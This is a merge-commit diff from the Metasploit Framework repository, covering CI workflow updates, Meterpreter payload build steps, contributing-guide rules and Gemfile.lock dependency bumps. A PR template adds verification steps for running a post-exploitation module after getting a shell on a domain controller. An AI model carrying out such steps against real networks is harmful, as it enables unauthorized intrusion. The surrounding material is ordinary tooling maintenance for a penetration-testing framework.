Merge pull request #20148 from adfoster-r7/add-additional-sni-support

Add additional sni support
Update version for rex-sslscan bump
2025-05-08 11:19:37 +01:00 · 2025-05-08 10:56:07 +01:00 · 2025-05-08 10:40:36 +01:00 · 2025-05-08 10:36:43 +01:00 · 2025-05-08 00:29:42 +01:00 · 2025-05-07 21:22:13 +01:00
1526 changed files with 101624 additions and 80468 deletions
@@ -64,16 +64,16 @@ jobs:
      matrix:
        os:
          - windows-2019
-          - ubuntu-20.04
+          - ubuntu-latest
        ruby:
-          - 3.1.5
+          - '3.2'
        include:
          # Powershell
          - { command_shell: { name: powershell }, os: windows-2019 }
          - { command_shell: { name: powershell }, os: windows-2022 }

          # Linux
-          - { command_shell: { name: linux }, os: ubuntu-20.04 }
+          - { command_shell: { name: linux }, os: ubuntu-latest }

          # CMD
          - { command_shell: { name: cmd }, os: windows-2019 }
@@ -126,6 +126,11 @@ jobs:
        with:
          path: metasploit-framework

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          BUNDLE_FORCE_RUBY_PLATFORM: true
@@ -175,6 +180,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -45,6 +45,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
        with:
@@ -33,6 +33,8 @@ on:
      - 'metsploit-framework.gemspec'
      - 'Gemfile.lock'
      - '**/**ldap**'
+      - 'lib/metasploit/framework/tcp/**'
+      - 'lib/metasploit/framework/login_scanner/**'
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
@@ -72,6 +74,11 @@ jobs:
          docker compose build
          docker compose up --wait -d

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -121,6 +128,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
+          - '3.2'

    name: Lint msftidy
    steps:
@@ -82,6 +82,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -138,6 +143,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -80,6 +80,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -137,6 +142,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -33,6 +33,8 @@ on:
      - 'metsploit-framework.gemspec'
      - 'Gemfile.lock'
      - '**/**postgres**'
+      - 'lib/metasploit/framework/tcp/**'
+      - 'lib/metasploit/framework/login_scanner/**'
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
@@ -82,6 +84,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -139,6 +146,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -0,0 +1,68 @@
+name: Shared Gem Verify
+on:
+  workflow_call:
+    inputs:
+      test_commands:
+        description: 'Test commands'
+        required: false
+        default: "bundle exec rspec"
+        type: string
+      dependencies:
+        description: 'Array of system dependencies to install'
+        required: false
+        default: "[]"
+        type: string
+
+jobs:
+  test:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: false
+      matrix:
+        ruby:
+          - '3.2'
+          - '3.3'
+          - '3.4'
+        os:
+          - ubuntu-22.04
+          - ubuntu-24.04
+          - ubuntu-latest
+          - windows-2019
+          - macos-13
+
+    env:
+      RAILS_ENV: test
+
+    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        if: ${{ inputs.dependencies != '[]' && !contains(matrix.os, 'macos') && !contains(matrix.os, 'windows') }}
+        run: |
+          dependencies=$(echo '${{ inputs.dependencies }}' | jq -r '.[]')
+          for dep in $dependencies; do
+            sudo apt-get -y --no-install-recommends install "$dep"
+          done
+        shell: bash
+
+      - name: Install system dependencies (Windows)
+        if: ${{ contains(matrix.os, 'windows') && inputs.dependencies != '[]' }}
+        run: |
+          $dependencies = (echo '${{ inputs.dependencies }}' | jq -r '.[]')
+          foreach ($dep in $dependencies) {
+            choco install $dep -y
+          }
+        shell: pwsh
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+
+      - name: Test
+        run: ${{ inputs.test_commands }}
@@ -0,0 +1,90 @@
+name: Shared Gem Verify Rails/PostgreSQL
+on:
+  workflow_call:
+    inputs:
+      test_commands:
+        description: 'Test commands'
+        required: false
+        default: "bundle exec rspec"
+        type: string
+      dependencies:
+        description: 'Array of system dependencies to install'
+        required: false
+        default: "[]"
+        type: string
+
+jobs:
+  test:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: false
+      matrix:
+        ruby:
+          - '3.2'
+          - '3.3'
+          - '3.4'
+        rails:
+          - '~> 7.0.0'
+          - '~> 7.1.0'
+          - '~> 7.2.0'
+        postgres:
+          - '9.6'
+          - '16.8'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+
+    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - Rails ${{ matrix.rails }} - PostgreSQL ${{ matrix.postgres }}
+    steps:
+      - name: Install system dependencies
+        run: |
+          dependencies=$(echo '${{ inputs.dependencies }}' | jq -r '.[]')
+          for dep in $dependencies; do
+            sudo apt-get -y --no-install-recommends install "$dep"
+          done
+        shell: bash
+
+      - name: Set up PostgreSQL service
+        run: |
+          docker run --name postgres -d -p 5432:5432 \
+            -e POSTGRES_USER=postgres \
+            -e POSTGRES_PASSWORD=postgres \
+            --health-cmd="pg_isready" \
+            --health-interval="10s" \
+            --health-timeout="5s" \
+            --health-retries=5 \
+            postgres:${{ matrix.postgres }}
+
+      - name: Wait for PostgreSQL to be healthy
+        run: |
+          docker exec postgres sh -c 'until pg_isready -U postgres; do echo waiting for postgres; sleep 2; done; echo postgres is ready'
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+
+      - name: Update Rails version
+        run: |
+          # Add the gem explicitly if it doesn't exist
+          if ! grep -q "gem ['\"]rails['\"]" Gemfile; then
+            echo 'gem "rails"' >> Gemfile          
+          fi
+          
+          # Ensure the gem is on the latest version
+          ruby -pi -e "gsub(/gem ['\"]rails['\"](, *['\"].*['\"])?/, \"gem 'rails', '${{ matrix.rails }}'\")" Gemfile
+          bundle update
+          bundle install
+          bundle show rails
+        shell: bash
+
+      - name: Test
+        run: ${{ inputs.test_commands }}
@@ -30,11 +30,11 @@ on:
        type: boolean

 jobs:
-  # Compile Java Meterpreter via docker if required, we can't always do this on the
+  # Compile the Meterpreter payloads via docker if required, we can't always do this on the
  # host environment (i.e. for macos). So it instead gets compiled first on a linux
  # host, then the artifacts are copied back to the host later
-  java_meterpreter_compilation:
-    name: Compile Java Meterpreter
+  meterpreter_compilation:
+    name: Compile Meterpreter
    runs-on: ubuntu-latest
    if: ${{ inputs.build_metasploit_payloads }}

@@ -46,21 +46,22 @@ jobs:
          path: metasploit-payloads
          ref: ${{ inputs.metasploit_payloads_commit }}

-      - name: Build Java and Android payloads
+      - name: Build Meterpreter payloads
        run: |
-          mkdir $(pwd)/java-artifacts
-          docker run --rm -w "$(pwd)" -v "$(pwd):$(pwd)" rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "set -x && cd metasploit-payloads/java && mvn package -Dandroid.sdk.path=/usr/local/android-sdk -Dandroid.release=true -Ddeploy.path=../../java-artifacts -Dmaven.test.skip=true -P deploy && mvn -Dmaven.test.skip=true -Ddeploy.path=../../java-artifacts -P deploy package"
+          mkdir $(pwd)/meterpreter-artifacts
+          docker run --rm -w $(pwd) -v $(pwd):$(pwd) rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/gem && rake create_dir && rake win_copy && rake php_prep && rake java_prep && rake python_prep && rake create_manifest && rake build"
+          cp $(pwd)/metasploit-payloads/gem/pkg/metasploit-payloads-* $(pwd)/meterpreter-artifacts

-      - name: Store Java artifacts
+      - name: Store Meterpreter artifacts
        uses: actions/upload-artifact@v4
        with:
-          name: java-artifacts
-          path: java-artifacts
+          name: meterpreter-artifacts
+          path: meterpreter-artifacts

  # Run all test individually, note there is a separate final job for aggregating the test results
  test:
-    needs: java_meterpreter_compilation
-    if: always() && (needs.java_meterpreter_compilation.result == 'success' || needs.java_meterpreter_compilation.result == 'skipped')
+    needs: meterpreter_compilation
+    if: always() && (needs.meterpreter_compilation.result == 'success' || needs.meterpreter_compilation.result == 'skipped')

    strategy:
      fail-fast: false
@@ -68,12 +69,12 @@ jobs:
        os:
          - macos-13
          - windows-2019
-          - ubuntu-20.04
+          - ubuntu-latest
        ruby:
-          - 3.1.5
+          - '3.2'
        meterpreter:
          # Python
-          - { name: python, runtime_version: 3.6 }
+          - { name: python, runtime_version: 3.8 }
          - { name: python, runtime_version: 3.11 }

          # Java
@@ -91,7 +92,7 @@ jobs:

          # Mettle
          - { meterpreter: { name: mettle }, os: macos-13 }
-          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
+          - { meterpreter: { name: mettle }, os: ubuntu-latest }

    runs-on: ${{ matrix.os }}

@@ -189,6 +190,11 @@ jobs:
          path: metasploit-framework
          ref: ${{ inputs.metasploit_framework_commit }}

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          BUNDLE_FORCE_RUBY_PLATFORM: true
@@ -208,28 +214,28 @@ jobs:
        working-directory: metasploit-framework

      - uses: actions/download-artifact@v4
-        name: Download Java meterpreter
-        id: download_java_meterpreter
-        if: ${{ matrix.meterpreter.name == 'java' && inputs.build_metasploit_payloads }}
+        name: Download Meterpreter
+        id: download_meterpreter
+        if: ${{ matrix.meterpreter.name != 'mettle' && inputs.build_metasploit_payloads }}
        with:
          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
          path: raw-data

-      - name: Extract Java Meterpreter (Unix)
-        if: ${{ matrix.meterpreter.name == 'java' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
+      - name: Extract Meterpreter (Unix)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
        shell: bash
        run: |
          set -x
-          download_path=${{steps.download_java_meterpreter.outputs.download-path}}
-          cp -r  $download_path/java-artifacts/data/* ./metasploit-framework/data
+          download_path=${{steps.download_meterpreter.outputs.download-path}}
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework

-      - name: Extract Java Meterpreter (Windows)
-        if: ${{ matrix.meterpreter.name == 'java' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
+      - name: Extract Meterpreter (Windows)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
        shell: bash
        run: |
          set -x
-          download_path=$(cygpath -u '${{steps.download_java_meterpreter.outputs.download-path}}')
-          cp -r  $download_path/java-artifacts/data/* ./metasploit-framework/data
+          download_path=$(cygpath -u '${{steps.download_meterpreter.outputs.download-path}}')
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework

      - name: Install mettle gem
        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
@@ -250,32 +256,6 @@ jobs:
          path: metasploit-payloads
          ref: ${{ inputs.metasploit_payloads_commit }}

-      - name: Get metasploit-payloads version
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        shell: bash
-        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
-        working-directory: metasploit-payloads
-
-      - name: Build metasploit-payloads gem
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        run: gem build ./gem/metasploit-payloads.gemspec
-        working-directory: metasploit-payloads
-
-      - name: Copy metasploit-payloads gem into metasploit-framework
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        shell: bash
-        run: cp ../metasploit-payloads/metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem .
-        working-directory: metasploit-framework
-
-      - name: Install metasploit-payloads gem
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        run: |
-          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
-          bundle config unset deployment
-          bundle update metasploit-payloads
-          bundle install
-        working-directory: metasploit-framework
-
      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
        shell: cmd
        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2019' && inputs.build_metasploit_payloads }}
@@ -294,12 +274,39 @@ jobs:
          make.bat
        working-directory: metasploit-payloads

-      - name: Build PHP, Python and Windows payloads
-        if: ${{ (matrix.meterpreter.name == 'php' || matrix.meterpreter.name == 'python' || runner.os == 'Windows') && inputs.build_metasploit_payloads }}
-        run: |
-          make install-php install-python install-windows
+      - name: Get metasploit-payloads version
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        shell: bash
+        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
        working-directory: metasploit-payloads

+      - name: Install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' }}
+        run: |
+          ruby -pi -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec (Windows)
+        if: ${{ inputs.build_metasploit_payloads && (runner.os == 'Windows' && matrix.meterpreter.name != 'windows_meterpreter') && matrix.meterpreter.name != 'mettle' }}
+        shell: cmd
+        run: |
+          ruby -pi.bak -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Bundle update/install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle config unset deployment
+          bundle update metasploit-payloads
+          bundle install
+        working-directory: metasploit-framework
+
      - name: Acceptance
        env:
          SPEC_HELPER_LOAD_METASPLOIT: false
@@ -342,6 +349,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -74,6 +74,11 @@ jobs:
          docker compose build
          docker compose up --wait -d

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -143,6 +148,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -60,16 +60,14 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
          - '3.2'
          - '3.3'
-          - '3.4.0-preview2'
+          - '3.4'
        os:
-          - ubuntu-20.04
          - ubuntu-latest
        include:
          - os: ubuntu-latest
-            ruby: '3.1'
+            ruby: '3.2'
            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
@@ -90,6 +88,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -0,0 +1,98 @@
+name: Weekly Data and External Tool Updater
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: write
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: write
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  schedule:
+    # Run once a week (e.g., every Monday at 01:00 UTC)
+    - cron: '0 1 * * 1'
+  workflow_dispatch: # Allows manual triggering from the Actions tab
+
+jobs:
+  update-data-files:
+    runs-on: ubuntu-latest
+
+    if: github.repository_owner == 'rapid7'
+
+    env:
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+
+      - uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Run Ruby updater scripts
+        run: |
+          ruby tools/dev/update_wordpress_vulnerabilities.rb
+          ruby tools/dev/update_joomla_components.rb
+          ruby tools/dev/update_user_agent_strings.rb
+          ruby tools/dev/check_external_scripts.rb -u
+      - name: Remove vendor folder # prevent git from adding it
+        run: rm -rf vendor
+
+      - name: Create Pull Request
+        uses: peter-evans/create-pull-request@v7
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+          commit-message: Update report
+          base: master
+          branch: weekly-updates
+          committer: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          author: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          title: "Weekly Data Update"
+          draft: false
+          body: |
+            This pull request was created automatically by a GitHub Action to update data files and external scripts.
+            The following tools were run:
+            - ruby tools/dev/update_wordpress_vulnerabilities.rb
+            - ruby tools/dev/update_joomla_components.rb
+            - ruby tools/dev/update_user_agent_strings.rb
+            - ruby tools/dev/check_external_scripts.rb -u
+            ## Verification
+            ### Wordpress/Joomla Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] Start `msfconsole`
+            - [ ] `use modules/auxiliary/scanner/http/wordpress_scanner`
+            - [ ] **Verify** it runs
+            ### JTR Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] See https://docs.metasploit.com/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes for hashes and cracking
+            ### SharpHound
+            - [ ] Start `msfconsole`
+            - [ ] get a shell on a DC or box connected to a dc
+            - [ ] `use post/windows/gather/bloodhound`
+            - [ ] `set session`
+            - [ ] `run`
+            - [ ] **Verify** it runs w/o erroring
+            - [ ] `set method disk`
+            - [ ] **Verify** it runs w/o erroring
@@ -22,6 +22,8 @@ Once you have finished your new module and tested it locally to ensure it's work
 Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
 will be closed. We need to ensure the code we're adding to master is written to a high standard.

+## Expedited Module Creation Process
+We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR.  A good-faith PR might not even work, but it will show that the author is working their way toward a solution.  Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted.  This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc.  In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly.  If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree.  We sincerely hope that the original author will remain involved in this expedited module creation process.  We would appreciate testing, critiquing, and any assistance that can be offered.  If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible.  In these cases of minor code changes, the authorship of the module will remain unchanged.  We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.

 ### Code Contribution Do's & Don'ts:

@@ -40,13 +42,18 @@ Keeping the following in mind gives your contribution the best chance of landing
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
-* **Do** list [verification steps] so your code is testable.
+* **Do** test your code.
+* **Do** list [verification steps] so committers can test your code.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
+* **Don't** include sensitive information in your PR (including externally-routable IP addresses in documentation).
+* **Don't** PR untested/unvalidated code you copy/pasted from the internet.
+* **Don't** PR untested/unvalidated code you copy/pasted from AI or LLM.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 * **Don't** post questions in older closed PRs.

 #### <u>New Modules</u>
+* **Do** check the issue tracker to see if there is a `suggestion-module` issue for the module you want to write, and assign yourself to it if there is.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
 * **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2020, Rapid7, Inc.
+Copyright (C) 2006-2025, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -1,7 +1,7 @@
 FROM ruby:3.2.5-alpine3.20 AS builder
 LABEL maintainer="Rapid7"

-ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
+ARG BUNDLER_CONFIG_ARGS="set force_ruby_platform 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
 ARG BUNDLER_FORCE_CLEAN="true"
 ENV APP_HOME=/usr/src/metasploit-framework
 ENV TOOLS_HOME=/usr/src/tools
@@ -37,8 +37,8 @@ group :development, :test do
  # environment is development
  gem 'rspec-rails'
  gem 'rspec-rerun'
-  # Required during CI as well local development
-  gem 'rubocop'
+  # Required during CI as well local development - pinned due to CI failure on: rubocop-1.73.2/lib/rubocop/config_loader.rb:272:in `read'
+  gem 'rubocop', '1.67.0'
 end

 group :test do
@@ -1,12 +1,12 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.40)
+    metasploit-framework (6.4.62)
      aarch64
      abbrev
-      actionpack (~> 7.0.0)
-      activerecord (~> 7.0.0)
-      activesupport (~> 7.0.0)
+      actionpack (~> 7.1.0)
+      activerecord (~> 7.1.0)
+      activesupport (~> 7.1.0)
      aws-sdk-ec2
      aws-sdk-ec2instanceconnect
      aws-sdk-iam
@@ -15,10 +15,12 @@ PATH
      base64
      bcrypt
      bcrypt_pbkdf
+      benchmark
      bigdecimal
      bootsnap
      bson
      chunky_png
+      concurrent-ruby (= 1.3.4)
      csv
      dnsruby
      drb
@@ -31,6 +33,7 @@ PATH
      faraday-retry
      faye-websocket
      ffi (< 1.17.0)
+      fiddle
      filesize
      getoptlong
      hrr_rb_ssh-ed25519
@@ -43,7 +46,7 @@ PATH
      metasploit-credential
      metasploit-model
      metasploit-payloads (= 2.0.189)
-      metasploit_data_models
+      metasploit_data_models (>= 6.0.7)
      metasploit_payloads-mettle (= 1.0.35)
      mqtt
      msgpack (~> 1.6.0)
@@ -60,6 +63,7 @@ PATH
      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
+      ostruct
      packetfu
      patch_finder
      pcaprub
@@ -67,7 +71,7 @@ PATH
      pg
      puma
      railties
-      rasn1 (= 0.13.0)
+      rasn1 (= 0.14.0)
      rb-readline
      recog
      redcarpet
@@ -90,9 +94,10 @@ PATH
      rex-struct2
      rex-text
      rex-zip
+      rinda
      ruby-macho
      ruby-mysql
-      ruby_smb (~> 3.3.3)
+      ruby_smb (~> 3.3.15)
      rubyntlm
      rubyzip
      sinatra
@@ -114,98 +119,114 @@ PATH
 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (1.1.1)
+    Ascii85 (2.0.1)
    aarch64 (2.1.0)
      racc (~> 1.6)
    abbrev (0.1.2)
-    actionpack (7.0.8.6)
-      actionview (= 7.0.8.6)
-      activesupport (= 7.0.8.6)
-      rack (~> 2.0, >= 2.2.4)
+    actionpack (7.1.5.1)
+      actionview (= 7.1.5.1)
+      activesupport (= 7.1.5.1)
+      nokogiri (>= 1.8.5)
+      racc
+      rack (>= 2.2.4)
+      rack-session (>= 1.0.1)
      rack-test (>= 0.6.3)
-      rails-dom-testing (~> 2.0)
-      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.8.6)
-      activesupport (= 7.0.8.6)
+      rails-dom-testing (~> 2.2)
+      rails-html-sanitizer (~> 1.6)
+    actionview (7.1.5.1)
+      activesupport (= 7.1.5.1)
      builder (~> 3.1)
-      erubi (~> 1.4)
-      rails-dom-testing (~> 2.0)
-      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.8.6)
-      activesupport (= 7.0.8.6)
-    activerecord (7.0.8.6)
-      activemodel (= 7.0.8.6)
-      activesupport (= 7.0.8.6)
-    activesupport (7.0.8.6)
+      erubi (~> 1.11)
+      rails-dom-testing (~> 2.2)
+      rails-html-sanitizer (~> 1.6)
+    activemodel (7.1.5.1)
+      activesupport (= 7.1.5.1)
+    activerecord (7.1.5.1)
+      activemodel (= 7.1.5.1)
+      activesupport (= 7.1.5.1)
+      timeout (>= 0.4.0)
+    activesupport (7.1.5.1)
+      base64
+      benchmark (>= 0.3)
+      bigdecimal
      concurrent-ruby (~> 1.0, >= 1.0.2)
+      connection_pool (>= 2.2.5)
+      drb
      i18n (>= 1.6, < 2)
+      logger (>= 1.4.2)
      minitest (>= 5.1)
+      mutex_m
+      securerandom (>= 0.3)
      tzinfo (~> 2.0)
    addressable (2.8.7)
      public_suffix (>= 2.0.2, < 7.0)
    afm (0.2.2)
-    allure-rspec (2.24.5)
-      allure-ruby-commons (= 2.24.5)
+    allure-rspec (2.26.0)
+      allure-ruby-commons (= 2.26.0)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.24.5)
+    allure-ruby-commons (2.26.0)
